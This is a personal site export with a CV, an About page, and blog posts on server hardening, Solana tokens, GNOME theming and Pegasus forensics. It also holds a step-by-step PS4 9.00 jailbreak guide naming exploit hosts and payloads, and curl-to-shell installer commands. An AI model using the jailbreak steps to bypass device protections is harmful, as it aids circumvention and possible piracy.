[{"content":"Luka Piplica # Last updated on 16. October 2022 Basic Info # Website Link E-mail: lukapiplica@protonmail.ch Website: https://lukapiplica.github.io Github: https://github.com/lukapiplica LinkedIn: https://linkedin.com/in/lukapiplica Professional Summary # Results-oriented and adaptable IT professional with experience in customer service, technical support, PC maintenance, and system administration. Possess adeptness in implementing technology-based solutions for business problems, along with standards, procedures, and processes that improve business functionality.\nWork Experience # Radiotelevision of Bosnia and Herzegovina (BHRT) # January 2022 - September 2022 IT Support Specialist, Sarajevo.\nMade custom Windows installations with preinstalled client programs for maximum efficiency. Administered and supervised the company network. On-site, client-side helpdesk support for: Microsoft Office, Adobe products, Cinegy and other internal programs and systems. Maintenance and administration of the internet radio link for RTVFBIH. Setting up and configuring WiFi routers, L2 and L3 switches and Hubs, and network cabling and cable marking. Monitoring and maintenance of print servers and printers. Webmail database administration. Administration of ESET antivirus server. Deployed and maintained a locally hosted web server, FTP, as well as multiple SMB shares Education # ITAcademy # 2019-2021 Network Administrator, Sarajevo.\nGained knowledge and experience on Windows 10, Windows Server 2016, GNU/Linux and nagiOS operating systems. Learned how to configure and set up Cisco and MikroTik devices on a network. Learned Bash, Batch and PowerShell scripting. Gained the ability to create a very detailed report on cyber security, and measures on preventing cyber attacks, as well as implementing them. Certification # Name Credential ID Network Administrator 025056 Railway School Center # 2015-2019 Electronics Technician, Sarajevo.\nFirst year, improved knowledge on different electronic parts and perfected soldering skills. Second year, programmed an Arduino controlled basketball scoreboard via an HTML website. Third year, designed a solar panel tree with a built in bluetooth radio that can charge mobile phones. Group project - retro radio with a built in Nixie tube clock. Programmed and assembled a robotic arm controlled via an Android application. Gained the ability to create custom PCB boards. Fourth year, led a group of highschool students and together with them participated in designing and making an infinite mirror. Gained knowledge on old and current models of telecommunication. High School Activities # Chemistry Fundamentals of Electrical Engineering English Mathematics Certificates # Name of the competition Type Place Railway School Center Basics of Electrical Engineering School First IX Labor Fest State First X Labor Fest State First XI Labor Fest State First Note: These certifications were issued in real life, but I have a digital copy; if you want to see them feel free to email me! Volunteer Experience # Adair Café Bar # November 2021 - February 2022 Website Developer and Graphic Designer\nI developed a website for the coffee shop; I learned many things such as HTML, CSS and website optimization. In addition, while I was programming the website, I gained some experience with graphic design for creating a new logo, menu and promotional poster. This led me to gain experience in Adobe Photoshop and Adobe Illustrator programs.\nLink: https://adaircafebar.cf Languages # Human # Language Proficiency English Professional working Bosnian/Croatian/Serbian Native or bilingual German Elementary Machine # Language Markup Python HTML bash/shell Latex CSS Markdown All Certifications # Certificates Certificate ID ITAcademy Certified Computer Network Administrator 025056 Google Digital Garage 325 B49 2XV Udemy Learn to code with Python 3! UC-8aea5973-75b9-45f4-ac48-c2b3542c071e The Complete Python Hacking Course: Begginer to Advanced! UC-b268fbf0-8a81-4575-97a3-75876f56ab12 TryHackMe Complete Begginer Learning Path THM-PV3UWE6H73 TryHackMe CompTIA Pentest+ Learning Path THM-VJ140KARRQ TryHackMe Offensive Pentesting Learning Path THM-EUR7X51H4W TryHackMe Web Fundamentals Learning Path THM-CMQJCBRKFN TryHackMe Advent of Cyber 2020 THM-TVKIPRVSSQ References # Feel free to email me with your interest in me, and I\u0026rsquo;ll refer you to someone who can vouch for me. ","date":"14 October 2022","permalink":"/cv/","section":"Curriculum Vitae","summary":"Luka Piplica # Last updated on 16. October 2022 Basic Info # Website Link E-mail: lukapiplica@protonmail.ch Website: https://lukapiplica.github.io Github: https://github.com/lukapiplica LinkedIn: https://linkedin.com/in/lukapiplica Professional Summary # Results-oriented and adaptable IT professional with experience in customer service, technical support, PC maintenance, and system administration.","title":"Curriculum Vitae"},{"content":"","date":"14 October 2022","permalink":"/","section":"Luka Piplica","summary":"","title":"Luka Piplica"},{"content":" 👋 About Me👋 How it all started # Hi, my name is Luka. I\u0026rsquo;m a young network administrator and cybersecurity reasercher. I\u0026rsquo;m into technology since I was little, and everything began with my first computer repair, a faulty RAM stick which I had to replace. After that I began experimenting with electronics inside PC\u0026rsquo;s and after some time I got some basic level knowledge on how computers work.\nI gained more knowledge as time passed by and I started by being an IT support for my family and friends starting with instructions on how to use a computer, then moving to reinstalling operating systems and after that I gained some basic A+ knowledge on computer systems.\nHigh School # I finished Railway School Center with the title of electrical tehnician. Thanks to many professors in this school, I gained new knowledge about various electronic components, telecommunication systems, etc.\nFirst Year # During the first year, I gained knowledge about electrical components (resistors, capacitors, coils, etc.) and improved my soldering skills. I won first place in the school competition in the subject Basics of Electrical Engineering. I also attended several high school sections including:\nelectrochemistry, English language, basics of electrical engineering, mathematics. Second Year # During the second year, I had the opportunity to work with a group of classmates on the project \u0026ldquo;Arduino Scoreboard\u0026rdquo;, which brought us won first place in the state competition (IX Labor Fest) in Hadžići.\nThe Arduino Scoreboard is made using an Arduino microcontroller, and a WiFi module that connects us to the HTML web page (which you can see on the laptop) and with it we control the numbers and time on the traffic light. The numbers are handmade from an LED strip that acts like seven-segment displays. Third year # During my third year, I learned to make my own PCB\u0026rsquo;s as well as advanced knowledge about transistors. This year we had to make something for our final project, I had the opportunity to work on an audio amplifier project.\nAs in previous year, we participated in the X Labor Fest, which was held in Zenica. As a project we had a solar tree which brought us first place.\nFourth year # In the final year, we mostly learned about telecommunications, where I had a topic about radio recievers for my final work. The project we worked on for the XI Labor Fest is an LED desk programmed with an Arduino microcontroller to display patterns.\nThis project brought us the first place for the third year in a row.\nITAcademy # After graduating from high school, I decided to continue my knowledge of information technology at the ITAcademy in the field of network administration. Specifically CCNA (Cisco Certified Network Administrator) preparation, where I learned to set up and configure many network devices, as well as advanced knowledge in using Windows Server and Linux operating systems. After graduating from the ITAcademy, I decided to expand my current knowledge in the cybersecurity sector. I am currently first in Bosnia and Herzegovina on the TryHackMe table.\nMy hobbies # ⌨️ [Linux OS]\nAdvanced knowledge of using Linux operating systems, various distributions and advanced knowledge of the terminal and its commands. I opted for the Linux operating system because I like to experiment with different TWMs (Tiling Window Manager). I have used these distributions below:\nUbuntu Linux Debian Linux Pop!_OS Kali Linux Parrot OS Arch Linux Artix Linux Manjaro Linux Gentoo Linux 💿 [Electronics]\nI always experiment with electronics, from computers to cell phones, televisions, etc.\nIf something is broken I always try to disassemble and fix it myself, and if I don’t know something there is always a good friend called the Internet. I am also familiar with the hardware and software side of many electronic devices.\n🤖 [Cybersecurity]\nI spend most of my free time researching and reading about new hacker attacks and how that attack was carried out.\nIf it is some malware then I make a virtual machine and install the malicious file and then analyze it. What the file is currently doing on the system, what other files is it communicating with, what is it writing to memory, etc. This is exactly why I started this blog so I could document this process.\n📚 [Arduino programming]\nMany projects can be done on an Arduino microcontroller. The Arduino serves us as the brain of electronic components.\nIt’s also great for beginners who want to learn about electronics, but that doesn’t mean the Arduino is just meant for them. We can do many complex projects with this microcontroller.\n🖥️ [Raspberry Pi]\nThe Raspberry Pi is a small computer with a processor, memory, etc. It opens up a lot of new opportunities for even more complex projects than Arduino, such as: satellite tracking, arcade machines with old games, SNES (Super Nintendo) emulator, etc.\n💻 [Old consoles]\nI collect old game consoles and then do projects on them.\nAn example of a project I was working on is installing a Linux OS on a Nintedno 3DS. I also modify consoles like for example Xbox 360 with an RGH or JTAG chip.\n📁 [Digital privacy activist]\nIt has long been known that big companies like Google and Facebook are spying on us. They put us in a position where a normal citizen is monitored 24 hours a day. Unfortunately, in Bosnia and Herzegovina, the topic of digital privacy is not so much mentioned. Why do companies have the right to collect data about us at all ?\nYour privacy, your control over your data and your freedom of speech on the internet !\nThank you for your time 💙 # ","date":"13 October 2022","permalink":"/about/","section":"About Me","summary":"👋 About Me👋 How it all started # Hi, my name is Luka. I\u0026rsquo;m a young network administrator and cybersecurity reasercher. I\u0026rsquo;m into technology since I was little, and everything began with my first computer repair, a faulty RAM stick which I had to replace.","title":"About Me"},{"content":"","date":"9 October 2022","permalink":"/categories/","section":"Categories","summary":"","title":"Categories"},{"content":"\r🐧 How to protect a Linux server ! 🐧\rEveryone already knows you should protect a server and make it more secure. Well, here are some basics steps to take to protect your servers. Let\u0026rsquo;s get right into it:\nFirstly I would highly recommend using HTTPS protocol for your mirrors!\nI will assume you have a fresh install of a Linux server, keep in mind these commands are focused on the apt packet manager, but they should work with other packet managers with minor changes.\nUpdating your server # After a fresh install, the first thing I do is update the server manually:\nsudo apt update sudo apt upgrade Enabling automatic updates # After updating my server manually, I usually enable automatic updates.\nKeep in mind depending on how critical the server is you might not want updates to break it.\nTo enable automatic updates you need a package called unattended-upgrades !\nsudo apt install unattended-upgrades Then you have to enable it:\nsudo dpkg-reconfigure --priority=low unattended-upgrades Secure Shell (SSH) # Preparation # Usually, connecting to servers is done remotely via SSH protocol on the default port of 22.\nFirstly I will make a new folder if it doesn\u0026rsquo;t exist in the /home directory called .ssh.\nmkdir ~/.ssh Then we will give the folder permissions of 700, which protects a file against access from other users while the issuing user still has full access.\nchmod 700 ~/.ssh Now we want to log out of our server if we are connected via ssh.\nlogout Generating a solid Secure Shell key pair # Now let\u0026rsquo;s generate a Public and a Private key pair so we can safely connect to the server. I use the ed25519 algorithm since it\u0026rsquo;s fast and doesn\u0026rsquo;t compromise security.\nI would also recommend using a passphrase.\nWindows Powershell: ssh-keygen -t ed25519 Linux Terminal: ssh-keygen -t ed25519 MacOS Terminal: ssh-keygen -t ed25519 This will store the private and public keys in your home/.ssh folder depending on your OS, it might be hidden.\nCopying the public key to the server remotely # After the public and private keys are generated, we need to transfer them to the server. I will use SCP to move the key to the server.\nWindows Powershell: scp $env:USERPROFILE/.ssh/id_ed25519.pub SERVER_USER@SERVER_IP:~/.ssh/authorized_keys Linux Terminal: ssh-copy-id SERVER_USER@SERVER_IP MacOS Terminal: scp ~/.ssh/id_ed25519.pub SERVER_USER@SERVER_IP:~/.ssh/authorized_keys Passwordless remote access and changing the default port # Now we need to lockdown our ssh and disable passwords so you can only log in with the generated key pairs. We will log into our server and edit the ssh config file.\nOpening the config file:\nsudo nano /etc/ssh/sshd_config Let\u0026rsquo;s change the default port of 22. Uncomment the Port line, delete the number 22 and put something to your liking.\nUse higher numbers like 4723, for example.\nNow on the AddressFamily line, you can specify if you want to use IPv4, IPv6 or both. I disable IPv6, but you don\u0026rsquo;t have to. If you choose only to use IPv4, then replace any with inet\nDisable root login by replacing PermitRootLogin yes to PermitRootLogin no.\nThen disable password authentication by replacing PasswordAuthentication yes with PasswordAuthentication no\nNow save the changes!\nRestarting SSH to apply changes # After we made changes to the config file, we now need to restart the ssh service.\nsudo systemctl restart sshd NOTE: Make sure you have a connection by trying to connect from another terminal/powershell. If you make a mistake, you can lock yourself out! Enabling firewall # Firstly check your used ports by:\nsudo ss -tupln You might have other ports used, do your research, but I\u0026rsquo;ll only enable ssh so I can connect to the server.\nFirst, let\u0026rsquo;s install ufw.\nsudo apt install ufw I will use ufw as my firewall. Remember the last port we put in the config file of ssh. We need to allow it. Also, it is always recommended to specify what protocol the port uses, either TCP or UDP!\nsudo ufw allow SSH_PORT/tcp Then we need to enable the firewall.\nsudo ufw enable To check what rules are allowed, we can use the following:\nsudo ufw status Disable ICMP (ping) # Usually, the command ping is helpful for network administrators and hackers. The best practice is to disable ping!\nTo disable ping, we need to edit ufw config.\nsudo nano /etc/ufw/before.rules Under the section called ok icmp codes for INPUT, paste this line so it will be first (right under ok icmp codes for INPUT).\n-A ufw-before-input -p icmp --icmp-type echo-request -j DROP Reboot the server:\nsudo reboot now Ping has now been disabled!\nConclusion # The non-hackable server doesn\u0026rsquo;t exist! Keep in mind that every server is hackable, but this is a good practice you should consider trying to harden your server.\nThank you for your time 💙 # ","date":"9 October 2022","permalink":"/blog/how-to-protect-a-linux-server/","section":"Blogs","summary":"🐧 How to protect a Linux server ! 🐧\rEveryone already knows you should protect a server and make it more secure. Well, here are some basics steps to take to protect your servers.","title":"How to protect a Linux server"},{"content":"","date":"9 October 2022","permalink":"/categories/linux/","section":"Categories","summary":"","title":"Linux"},{"content":"","date":"13 June 2022","permalink":"/blog/","section":"Blogs","summary":"","title":"Blogs"},{"content":"","date":"21 April 2022","permalink":"/categories/consoles/","section":"Categories","summary":"","title":"Consoles"},{"content":"\r🎮 PS4 restoration and 9.00 Jailbreak 🎮\rLegal disclaimer: I plan on using this PS4 to install Linux on it and play with it out of curiosity. I do not condone piracy; this article is meant only for educational purposes! I am not held accountable for your actions ! I bought a used PS4 Slim console to play with, and it was on 8.50 firmware and was never cleaned inside. The first thing I did was open it up to see what was \u0026ldquo;under the hood.\u0026rdquo; When I opened it up, I saw dust and when I turned it on the PS4 was soo loud. That meant the thermal paste needed to be replaced, and the fans needed to be cleaned. Here is a picture of what was inside:\nI planned on installing Linux on this PS4, but that requires a jailbreak and a specific firmware version, and that is why I bought it with a low enough firmware version so I can upgrade it to 9.00.\nYou cannot downgrade firmware on the PS4; you can only upgrade it !\nWhat do you need:\nFormated USB stick Thermal Paste Screwdrivers Rubbing Alcohol Patience Computer/Laptop Restoration: # Firstly I opened the PS4 up, unscrewed some screws, and this is what the insides looked like:\nNow I use rubbing alcohol to get rid of the old thermal paste.\nThe new thermal paste I applied is Arctic MX-4.\nAfter cleaning the fan and the heatsink, this is what the result looks like:\nMuch better !\n9.00 Jailbreak # After I assembled the PS4 Slim, I booted it up without Internet and did a factory reset by going into the Settings/Initialization/Initialize PS4. This option erased everything on the PS4 that was previously on, including games and accounts.\nNow comes the fun part, the jailbreak. Firstly go into Settings/System/Automatic Downloads and make sure to uncheck all boxes.\nAfter that, go to Settings/Network and uncheck the box that says Connect to the Internet. This option prevents the PS4 from downloading the latest firmware update.\nNow go to Settings/System/System Information and see your firmware version. I have the 8.50 version, so I need to update my PS4 to 9.00 manually.\nUpdating the PS4 to 9.00 # To update the PS4 to 9.00, you will need a USB drive and a PC. First, you have to get the 9.00 firmware. There are two websites one has faster downloads but requires a free account, and the second one has slower downloads but requires no account. Dark Software (faster downloads but requires an account) Darth Sternie (slower downloads but requires no account) Whichever you choose, make sure to download the 9.00 firmware.\nAfter the download, make sure to name the file PS4UPDATE.PUP\nNow, format it in exFAT to your USB drive.\nAfter your USB has done formatting, go to the root folder of your USB and make a new folder called PS4, go into that folder and create another new folder called UPDATE, and then inside the UPDATE folder, you are going to copy the PS4UPDATE.PUP file. Keep in mind that the folders have to be in all caps.\nNow eject the USB drive, go over to the PS4 and check your notifications and clear them!\nPlug your USB drive into PS4 and go to Settings/System Software Update, which should detect the update from your USB to 9.00. Follow the instructions on the screen and update the PS4.\nJailbreaking the PS4 # After you are on the 9.00 firmware version, go to Settings/Network and check the box we unchecked earlier, Connect to the Internet.\nNow go to the option below Set Up Internet Connection, you can use either WiFi or Ethernet then choose Custom, you can choose if you want DHCP or a static IP, then choose Do not specify for DHCP hostname and make sure to choose Manual for the DNS Settings!\nAs my primary DNS, I use 192.241.221.79, and as my secondary DNS, I use 165.227.83.145! These DNS IPs block all connections to Sony\u0026rsquo;s servers so that the PS4 will not accidentally get an update.\nAfter the DNS has been specified, click next and choose Automatic for MTU Settings and Do not use for Proxy Server.\nNow unplug the USB drive from the PS4 that had the 9.00 update file and plug it back into the PC.\nOn the PC, you will have to download Rufus and the exfathax.img from Github. Open Rufus, select your USB drive, and as the ISO, select the exFAThax.img file and click Start in Rufus.\nNow go to the PS4 and before you plug in your USB, open the PS4 web browser and make sure to clear all history and cache from it. After that, you can use a host you like that offers payloads.\nI use Karo218 !\nNow, after you have cleared all your browsing history, cookies and data, go to the host and click on 9.00 Gold you will have to wait for the exploit to cache itself for offline use. After it is finished, click on the GoldHenV2.2.4, and the exploit will tell you when to plug in your USB.\nWait for the payload to display the GoldHEN notification, and you have a jailbroken PS4.\nNOTE: If there are any errors or the console crashes, restart the PS4 and try again!\nThis Jailbreak is not persistent, which means after a shutdown or a reboot, you have to do everything again, one solutiion is to put your PS4 in rest mode, or you could make everything automatic, but it requires an ESP32-52 or a Raspberry Pi! Final result # Conclusion # Enjoyable project to do, significantly since the price of the PS4 has dropped because of the PS5 release. Cleaning up the PS4 was satisfying, and I must say it is tricky to open the Slim model. Jailbreak was successful as expected, and for me, it worked almost 80% of the time, it had some crashes here and there, but a reboot fixed it. I am looking forward to installing Linux on the console.\nThank you for your time 💙 # ","date":"21 April 2022","permalink":"/blog/ps4-restoration-and-jailbreak/","section":"Blogs","summary":"🎮 PS4 restoration and 9.00 Jailbreak 🎮\rLegal disclaimer: I plan on using this PS4 to install Linux on it and play with it out of curiosity. I do not condone piracy; this article is meant only for educational purposes!","title":"PS4 restoration and 9.00 Jailbreak"},{"content":"","date":"22 January 2022","permalink":"/categories/cryptocurrency/","section":"Categories","summary":"","title":"Cryptocurrency"},{"content":" 💸 HSKY Token 💸 What is a Crypto Token ? # Today more and more people use cryptocurrencies; some famous ones are Bitcoin, Dogecoin, Etherium, Solana etc. All these cryptocurrencies have their blockchain. We are making a crypto token; unlike other popular cryptocurrencies with their own blockchain, crypto tokens work on blockchains of other cryptocurrencies. Specifically, we will use Solana because of the cheap fee when switching this token and the speed (Solana has a very fast blockchain, unlike the others).\nWhat is needed: # Operating system: Debian Linux Github profile Github Crypto exchange Binance Phantom wallet PhantomWallet Solflare Solflare NOTE: It is necessary to buy Solana! Instructions # We need to create a virtual machine and then install Debian Linux in the CLI (without a graphical interface).\nAfter installing Debian, the first thing you need to do is update the system.\nUpdating Debian # sudo apt update sudo apt upgrade Installing Solanas tools # sh -c \u0026#34;$(curl -sSfL https://release.solana.com/v1.8.5/install)\u0026#34; Then type exit and log in to CLI again.\nCreating a Crypto Wallet # solana-keygen new Press enter twice, and you have successfully created a wallet.\nNOTE: Public key is actually your wallet address, and save the seed phrase somewhere in case you lose the wallet! Buying Solana # To make our token, we have to buy Solana. My recommendation is Binance.\nTransfering Solana: # After we buy Solana, it is located on Binance. We need to transfer it to the wallet on the virtual machine.\nNOTE: The address you are sending to from Binance is the public key we made in a virtual machine! After we have successfully transferred Solana, we want to see how many Solana we have in CLI; we type:\nsolana balance Installation of Rust # curl https://sh.rustup.rs -sSf | sh After clicking enter, press 1 for the default installation.\nType exit and log in to the virtual machine again.\nInstallation of required packages # sudo apt install libudev-dev libssl-dev pkg-config build-essential Installation of SPL # cargo install spl-token-cli Creating a crypto token # spl-token create-token Creating an account that will keep our token # spl-token create-account *TOKEN ID* NOTE: Token ID is a token that we got by entering the last command! Minting tokens and creating the number of tokens # spl-token mint *FIRST TOKEN ID* *NUMBER OF QUANTITIES* *SECOND TOKEN ID OF THE ACCOUNT* You have successfully created your token.\nTransferring your tokens to others: # To transfer your token to others, they must first make a wallet either on the phone or in a web browser. If you want to make a wallet on your phone, then Solflare is a great wallet, and if you\u0026rsquo;re going to make a wallet in a web browser, I suggest Phantom Wallet.\nspl-token transfer --fund-recipient --allow-unfunded-recipient *FIRST TOKEN ID* *HOW MUCH DO YOU WANT TO SEND* *WALLET ADDRESS TO WHICH WE WILL SEND OUR TOKENS* Solscan site # Solscan website: https://solscan.io/ We can paste the first TOKEN ID on this page to check our token.\nAdding a Token to the Solana registry # Firstly create an image for your token; it must be less than 200kb.\nMake a Github account.\nPlease create a new repository and upload an image of your token to that repository (name it logo.png).\nVisit https://github.com/solana-labs/token-list and fork it. Press . to open Visual Studio Code in your web browser. On the left, go to assets/mainnet right, click and create a new folder and paste the Token address.\nRight-click on the folder and click upload, then upload the image of your token.\nThen go to the src folder on the left, and you will see tokens folder, open the solana.tokenlist.json file.\nGo to the bottom of the file and then add your token in JSON format; it\u0026rsquo;s easiest to copy and paste the information from the token before yours and then change the values.\nOn the left, there is an icon with three dots; click on it, then add a message about what you\u0026rsquo;re doing and click on the checkmark.\nThen go back to Solana\u0026rsquo;s GitHub and request a pull request.\nDo the merge and wait for the process to end. Solana does a check every hour, so your pull request may only be received after an hour.\nFinal product # Conclusion # It is an exciting project; much can be learned, especially about cryptocurrencies and how they work. Currently, this project has no application and is not a project that can earn you money, but knowledge is enough.\nThank you for your time 💙 # ","date":"22 January 2022","permalink":"/blog/hsky-token/","section":"Blogs","summary":"💸 HSKY Token 💸 What is a Crypto Token ? # Today more and more people use cryptocurrencies; some famous ones are Bitcoin, Dogecoin, Etherium, Solana etc. All these cryptocurrencies have their blockchain.","title":"HSKY Token"},{"content":"\r💻 GNOME goes NORD configuration files 💻\rThese are my current dotfiles of Ubuntu Linux.\nThe installation will help you create the same look as in the pictures; here are the step-by-step instructions.\nSystem specifications:\nOS: Ubuntu GTK Theme: Nordic Icon Theme: Flatery_Dark Cursor Theme: Oreo_Blue Browser: Firefox Installation # I assume you have freshly installed Ubuntu 20.04 with minimal installation to start making this look.\nIf you are interested in what an application does, Wikipedia will help you.\nRepository upgrade and system upgrade # sudo apt update sudo apt upgrade Installation of Gnome Tweak Tool # We must first install the gnome tweak tool to install the gnome extensions.\nInstallation of Gnome Tweak Tool: sudo apt install gnome-shell-extensions Then open Firefox and go to LINK and download the add-on.\nDownload the necessary add-ons:\nAfter downloading the Gnome Extension add-on, we need to move the slider to On for a few add-ons; you can find them at the links below:\nDash to Panel User Themes Transparent Window Moving Then make sure they are included in the operating system by opening the Gnome Tweak Tool app and making sure the above add-ons are included; also, turn off the Desktop icons.\nNOTE: You can set Dash to Panel in the settings as you wish (to make icons smaller etc.). Also, Transparent Window moving my settings are at 0.2. Installation of Pop Shell # sudo apt install git node-typescript make After installing the necessary dependencies, we need to go to the Downloads folder in the terminal.\ncd ~/Downloads Then we need to clone the repository:\ngit clone https://github.com/pop-os/shell.git Then we enter the shell folder:\ncd shell Installation of Pop Shell:\nmake local-install Installation of other applications # Installation of neofetch: sudo apt install neofetch Installation of zathura: sudo apt install zathura Installation of tty-clock: sudo apt install tty-clock Installation of cmatrix: sudo apt install cmatrix Installation of htop: sudo apt install htop Installation of ranger: sudo apt install ranger Installation of Vim: sudo apt install vim Installation of Lollypop: sudo apt install lollypop Installation of cbonsai: cd ~/Downloads sudo apt install libncursesw5-dev git clone https://gitlab.com/jallbrit/cbonsai cd cbonsai make install PREFIX=~/.local Installation of tty-tetris: cd ~/Downloads sudo apt install cmake git clone https://github.com/Holixus/tty-tetris-v2.git cmake . make sudo make install Installation of Cava: We first install the necessary dependencies:\nsudo apt install libfftw3-dev libasound2-dev libncursesw5-dev libpulse-dev libtool automake libiniparser-dev export CPPFLAGS=-I/usr/include/iniparser Then we go to the Downloads folder and clone the Cava repository:\ncd ~/Downloads git clone https://github.com/karlstav/cava.git Then we need to compile Cava:\ncd cava ./autogen.sh ./configure make Now we can install Cava:\nsudo make install Installation of Ttyper: sudo apt install cargo sudo apt install ttyper GRUB theme installation # Repository cloning: cd ~/Downloads git clone https://github.com/semimqmo/sekiro_grub_theme GRUB theme installation: sudo ./install.sh Various theme installation # GTK Theme: Nordic Icon Theme: Flatery_Dark Cursor Theme: Oreo_Blue NOTE: To install these themes, you need to create two hidden folders in the home directory. cd ~/ mkdir .themes mkdir .icons In the .themes folder, we need to insert the GTK theme and the Icon theme, and in the .icons, we need to insert the Cursor theme. Then we need to enable them from the Gnome Tweak Tools application.\nCreate or download an existing Startpage and add it to Firefox.\nChange Wallpaper through Gnome Tweak Tool.\nWikipedia # Now that we\u0026rsquo;ve made this GNOME configuration, it\u0026rsquo;s time to clarify what each application does.\n🧠 [Pop Shell]\nPop Shell gives us the option to use the Tilling Window Manager on the Desktop system, which arranges the windows on the screen by a script and thus saves screen space.\n⌨️ [Neofetch]\nNeofetch is a command that gives us system specifications, plus it has a cool look.\n🍫 [Zathura]\nZathura is a PDF reader where it is possible to change the layout and many other options using a single configuration file.\n🐚 [Ranger]\nRanger serves us as a file manager in the terminal.\n📋 [Vim] text editor\nAs many people use notepad on Windows operating systems, we use nano and Vim.\nThe Nano text editor is much easier to use, while the Vim is made more for developers because of its shortcuts.\n🌳 [cbonsai]\nCbonsai is a script that makes a tree of characters, letters and numbers in our terminal.\n🎮 [tty-tetris]\nTty-Tetris is an application that allows us to play Tetris on the terminal.\n📰 [ttyper]\nTtyper is an application that measures the typing speed in the terminal.\n🕶️ [Nordic] GTK theme.\nNordic Dark is a GTK theme (theme for user interface applications) that gives us a dark look at applications with a user interface.\n🔷 [Flattery] icon theme.\nThe name itself says, applications that have a user interface mostly have icons that we can click with the mouse; this theme gives us a different look to the icons.\n🔵 [Oreo Blue] cursor theme.\nThis theme gives us a blue cursor look; it was inserted just for the looks and because it matches all the other colours of this operating system.\n🔥🦊 [Firefox] web browser.\nI use Firefox because it is one of the best privacy-oriented web browsers, in my opinion.\n⏰ tty-clock\nTty-clock is an application that aims to show the time and date in the terminal.\n🎚️ CAVA audio visualizer.\nCava is an application that serves as an audio visualizer.\n📈 HTop\nThe HTop application shows which processors are currently running and how much RAM they are taking in, and many other things. Think of HTop as a Task Manager in Windows.\n😎 CMatrix\nCMatrix is an application that is here just for looks, and its purpose is to print some text in an open terminal that aims to give a display of hacking from the Matrix movie.\n🤠 Ranger\nRanger is an application that allows us to see and access all files on the computer in the terminal.\n🍭 Lollypop\nLollypop is a music app; we play songs through it.\nThanks you for your time 💙 # ","date":"19 October 2021","permalink":"/blog/gnome-ubuntu-nordic/","section":"Blogs","summary":"💻 GNOME goes NORD configuration files 💻\rThese are my current dotfiles of Ubuntu Linux.\nThe installation will help you create the same look as in the pictures; here are the step-by-step instructions.","title":"[GNOME] Ubuntu Nodric"},{"content":"","date":"21 July 2021","permalink":"/categories/cybersecurity/","section":"Categories","summary":"","title":"Cybersecurity"},{"content":" 🔍 NSO Pegasus Spyware 🔍 What is Pegasus Spyware ? # Over the weekend, news leaked that several authoritarian governments (including Mexico, Morocco and the UAE) used spying software developed by the Israeli company NSO Group . Their goal was to spy on politicians, activists and journalists. A list of 50,000 telephone numbers potentially used for espionage has come into the possession of the Parisian non-profit organization Forbidden Stories and Amnesty International , which they shared with the public The Washington Post and The Guardian .\nAfter cyber security researchers analyzed several phones of victims of this attack, they discovered that it is a complex malware, which can access all data on the phone, from messages, and phone calls to your photos, and worst of all, Pegasus allows you to record conversations, and access the microphone and camera. This means this spyware can track you 24/7 and record whatever you say, do, and where you are.\nAlso, this spyware is made for both iOS and Android operating systems.\nHow Pegasus works ? # Pegasus works using the so-called. \u0026ldquo;0-day exploits\u0026rdquo;. These are system errors that almost no one knows about, not even the companies behind operating systems, electronics, etc. A more straightforward explanation is that Apple doesn\u0026rsquo;t know that these bugs exist in the code, which is why there are \u0026ldquo;bug bounty\u0026rdquo; programs that cyber security researchers sign up for. They look for bugs in the system, and they are rewarded money depending on the impact of that bug. Of course, suppose cyber security researchers fail to detect code errors (bugs) before hackers with bad intentions. In that case, this is a problem and contributes to the development of various malicious software such as Pegasus. As far as we know, it is enough to receive only one call or text message (which you do not have to click or answer) to get your iOS or Android device infected.\nHow to delete this spyware from your mobile device ? # There is no way to remove Pegasus from your mobile device, but the best advice is to update your mobile operating system to the latest version constantly. The last known version of iOS that is vulnerable to this hacking method is iOS 14.6.\nHow to detect Pegasus ? # Pegasus is difficult to detect after it is installed on your mobile device, and it is designed to be deleted by itself in case it gets the wrong phone number or recognizes that the device has not been active for more than 60 days. There are currently several IOCs (Indicators of Compromise) that have been found, and you can find them on AmnestyTech Github .\nHow to do digital forensics on your device ? # Now I will show you how to do digital forensics on your device, with which you can check if you are infected with this spyware.\nRequired:\nOperating system: Kali Linux Program: MVT (Mobile Verification Toolkit) IOCs: AmnestyTech IOCs Instructions # After installing or booting the Kali Linux operating system into the virtual machine, the first thing we need to do is the system update.\nI use Kali Linux in this example, but any distribution based on Debian Linux should work with slight differences in commands.\nUpdating Kali Linux # We open the terminal and type the following commands:\nsudo apt update sudo apt upgrade Installation of MVT # We first need to install a few \u0026ldquo;dependencies\u0026rdquo; to make the MVT work properly.\nInstallation of dependencies: sudo apt install python3 python3-pip libusb-1.0-0 git Installation of MVT:\nAfter installing the dependencies, we install the MVT. First, we enter the Downloads directory.\ncd Downloads Then we have to download MVT from GitHub: git clone https://github.com/mvt-project/mvt.git We now enter the MVT directory we downloaded: cd mvt We now install MVT using this command: pip3 install . Adding a PATH variable: export PATH=$PATH:/home/*USERNAME*/.local/bin Note: USERNAME you need to change depending on the username on Linux. Downloading IOCs # We will first change the directory in the Downloads folder: cd ~/Downloads Then we clone the repository: git clone https://github.com/AmnestyTech/investigations.git Digital forensics on iOS devices. # If you have an iOS (Apple) device, follow the instructions below; if not, you can find instructions for Android systems under Digital Forensics on Android devices.\nA copy of your device\u0026rsquo;s system # The first step in this process is to back up the operating system file on the mobile so we can analyze it. There are two methods Filesystem dump and iTunes Backup.\nFilesystem dump is a method that requires jailbreak an iOS system that you can do using [checkra1n] ( https://checkra.in/) . The advantages of this method are that you can \u0026ldquo;dump\u0026rdquo; the entire system and use it to extract more data, but unfortunately, jailbreaking iPhone loses the warranty, and some iPhones on specific iOS versions cannot be jailbreaked.\niTunes Backup is an alternative option, although it will extract less data again, retaining your device\u0026rsquo;s warranty.\nNOTE: You can extract more data with the iTunes Backup method if you use encrypted backup. Backup of iOS using iTunes # You can back up iTunes on a Windows device. Instructions:\nInstall iTunes on your computer or laptop. Connect iPhone with a cable to your computer or laptop. Open your iPhone in iTunes. If you want better results, then choose the encrypted backup option. Run a backup; it can take up to 30 minutes. Once the backup is complete, you can find its location on Windows 10 operating systems in one of two folders:\n%USERPROFILE%\\Apple\\MobileSync\\ %USERPROFILE%\\AppData\\Roaming\\Apple Computer\\MobileSync\\ The easiest way to find them is to paste %USERPROFILE% into the \u0026ldquo;Search\u0026rdquo; bar and check the folder manually. The important folder is the folder with UDID (a folder named 0000 [REDACTED]).\nDecrypting backup: # If you have encrypted your backup, let\u0026rsquo;s transfer it to a computer or virtual machine with Linux (in this example, I will move the file from USB to the Documents folder); then we need to create a folder to decrypt:\nmkdir ~/Documents/decrypted Now we are decrypting the file:\nmvt-ios decrypt-backup -p \u0026#39;YOUR_PASSWORD\u0026#39; -d 